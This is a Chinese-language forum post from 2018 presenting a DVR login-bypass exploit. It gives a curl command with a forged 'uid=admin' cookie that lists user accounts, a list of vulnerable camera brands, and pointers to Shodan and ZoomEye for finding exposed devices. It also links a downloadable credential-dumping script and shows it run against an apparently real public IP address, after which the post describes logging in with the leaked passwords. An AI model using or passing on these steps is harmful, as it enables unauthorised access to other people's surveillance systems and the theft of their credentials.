本帖最后由 Snow狼 于 2018-6-4 10:27 编辑
dvr登录绕过漏洞
此漏洞允许×××者构造一个cookie即可登录
漏洞语句:curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
测试有此漏洞的dvr:
Novo
CeNovo
QSee
Pulnix
XVR 5 in 1 (title: "XVR Login")
Securus, - Security. Never Compromise !! -
Night OWL
DVR Login
HVR Login
MVDR Login
用shodan查询:
用zoomeye查询:
工具链接:https://pan.baidu.com/s/1X96sJRIwHZcnoBOcWq2CpQ密码:dcoc
依旧是我们的linux基础命令:
unzip 解压
cd 到文件目录
pip install -r requirements.txt
注意:getDvr为启动脚本下图的红框框
python2.7 getDVR_Credentials.py --host (ip地址) 59.152.178.44 --port (端口) 9000
看红圆圈即是爆出来的密码然后访问那个IP地址填写用户名和密码就可以登入了
这就基本显示出来了晒几张成果图
